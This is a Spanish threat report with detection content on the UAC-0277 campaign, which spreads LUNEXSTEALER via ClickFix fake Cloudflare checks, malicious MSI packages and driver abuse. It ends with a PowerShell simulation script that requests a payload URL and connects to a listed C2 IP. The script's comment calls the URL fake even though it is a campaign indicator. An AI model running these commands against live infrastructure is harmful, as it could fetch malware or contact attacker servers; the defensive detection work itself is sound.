Ataques UAC-0277 Distribuyen LUNEXSTEALER a través de MSI Malicioso y ClickFix
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Los actores de amenazas rastreados como UAC-0277 están comprometiendo sitios web legítimos para inyectar JavaScript malicioso que atrae a los usuarios a ejecutar comandos a través de una página de verificación de Cloudflare falsa. Esta técnica ClickFix finalmente entrega paquetes MSI que contienen LUNEXSTEALER o cargadores adicionales que emplean BYOVD para evadir controles de seguridad. La campaña también utiliza infraestructura de comando y control basada en blockchain en Polygon y Ethereum para gestionar dinámicamente los recursos del atacante.
Investigación
CERT-UA identificó más de 100 sitios web comprometidos y analizó tres variantes MSI asociadas con la campaña. Los investigadores observaron la carga lateral de DLL que involucra a FnHotkeyUtility.exe y la explotación del controlador vulnerable AMD PDFWKRNL.sys para eludir protecciones de Windows Defender. La investigación también descubrió la extensión de navegador LUNARAXE y el componente de PowerShell NAIVEMESS utilizados para recopilar y exfiltrar datos.
Mitigación
Los administradores deben restringir el acceso al diálogo Ejecutar (Win+R) a través de la Política de Grupo y limitar los privilegios de instalación de MSI a usuarios autorizados. Habilitar la lista de bloqueo de controladores vulnerables de Microsoft es esencial para reducir el riesgo de ataques BYOVD. Las organizaciones también deben aplicar listas blancas de extensiones de navegador y monitorear actividad sospechosa en la línea de comandos de msiexec.exe que involucre URLs remotas.
Respuesta
Cuando se detecte la ejecución sospechosa de MSI o extensiones de navegador no autorizadas, se debe aislar el host afectado y terminar los procesos asociados con LUNEXSTEALER. Revisar las tareas programadas en busca de entradas nombradas psychedelicloveUtils e inspeccionar los perfiles del navegador para la extensión Microsoft Office Word Editor. Cualquier página de verificación de Cloudflare falsa identificada asociada con la campaña debe ser reportada a CERT-UA.
Flujo de Ataque
Detecciones
Entrada RunMRU Sospechosa Con Semántica LOLBin (vía evento de registro)
Posible Intento de Instalación Remota de Archivo MSI (vía línea de comandos)
Tarea Programada Sospechosa (vía auditoría)
Descarga de Archivo Directo Sospechosa por IP (vía proxy)
Comando y Control Sospechoso por Solicitud DNS de Dominio de Nivel Superior (TLD) Inusual (vía DNS)
IOCs (HashSha256) para detectar: Campaña UAC-0277: Despliegue de MSI Malicioso a través de la Técnica ClickFix y el Malware LUNEXSTEALER Parte 2
IOCs (HashSha256) para detectar: Campaña UAC-0277: Despliegue de MSI Malicioso a través de la Técnica ClickFix y el Malware LUNEXSTEALER Parte 1
IOCs (HashMd5) para detectar: Campaña UAC-0277: Despliegue de MSI Malicioso a través de la Técnica ClickFix y el Malware LUNEXSTEALER Parte 2
IOCs (HashMd5) para detectar: Campaña UAC-0277: Despliegue de MSI Malicioso a través de la Técnica ClickFix y el Malware LUNEXSTEALER Parte 1
IOCs (SourceIP) para detectar: Campaña UAC-0277: Despliegue de MSI Malicioso a través de la Técnica ClickFix y el Malware LUNEXSTEALER
IOCs (DestinationIP) para detectar: Campaña UAC-0277: Despliegue de MSI Malicioso a través de la Técnica ClickFix y el Malware LUNEXSTEALER
Detectar Interacción con Servidores C2 Maliciosos Usando HTTP y WebSocket [Conexión de Red de Windows]
FnHotkeyUtility Ejecutando spkvol.dll Malicioso a través de Carga Lateral de DLL [Windows Sysmon]
Descarga de Paquete MSI Malicioso usando Msiexec y Explotación de Vulnerabilidades [Creación de Procesos de Windows]
Detectar JavaScript Malicioso en Sitios Web Comprometidos [Servidor Web]
Ejecución de Simulación
-
Narrativa del Ataque & Comandos: El adversario ha realizado con éxito un compromiso de acceso remoto. Para establecer persistencia y descargar el malware de la siguiente etapa, el agente implantado intenta recuperar un archivo llamado
psychedeliclove.exedesde un URI específico. Simultáneamente, el agente intenta enviar señales a un nodo C2 secundario ubicado en193.178.159.128en el puerto8080para recibir instrucciones a través de una conexión HTTP tipo WebSocket. Estos indicadores específicos están destinados a activar las reglas de detección basadas en proxy existentes. -
Script de Prueba de Regresión:
# Script de Simulación para Validación de Detección # Propósito: Activar los indicadores específicos de URL y IP/Puerto en la regla de detección. Write-Host "[*] Iniciando Simulación..." -ForegroundColor Cyan # 1. Activar Selección 1: Patrón de URL Maliciosa Write-Host "[*] Intentando acceder al patrón de URL maliciosa..." -ForegroundColor Yellow try { # Usamos un oyente local inexistente o una URL falsa para asegurarnos de no acceder realmente a un sitio malicioso, # pero el proxy aún debe registrar el intento de solicitud. Invoke-WebRequest -Uri "http://107.175.82.242:9000/wilow/psychedeliclove.exe" -ErrorAction SilentlyContinue } catch { Write-Host "[!] Solicitud fallida (esperada), pero la telemetría debería generarse." -ForegroundColor Gray } # 2. Activar Selección 2: IP y Puerto Específicos Write-Host "[*] Intentando conectar a la IP C2 en el puerto 8080..." -ForegroundColor Yellow try { $client = New-Object System.Net.Sockets.TcpClient $client.Connect("193.178.159.128", 8080) $client.Close() } catch { Write-Host "[!] Conexión fallida (esperada), pero los logs del proxy deberían capturar el intento." -ForegroundColor Gray } Write-Host "[*] Simulación Completa." -ForegroundColor Cyan -
Comandos de Limpieza:
# No se crean archivos persistentes por esta simulación. # Solo se intentan conexiones de red temporales. Write-Host "[*] Limpieza completa. No se dejaron artefactos en el sistema." -ForegroundColor Green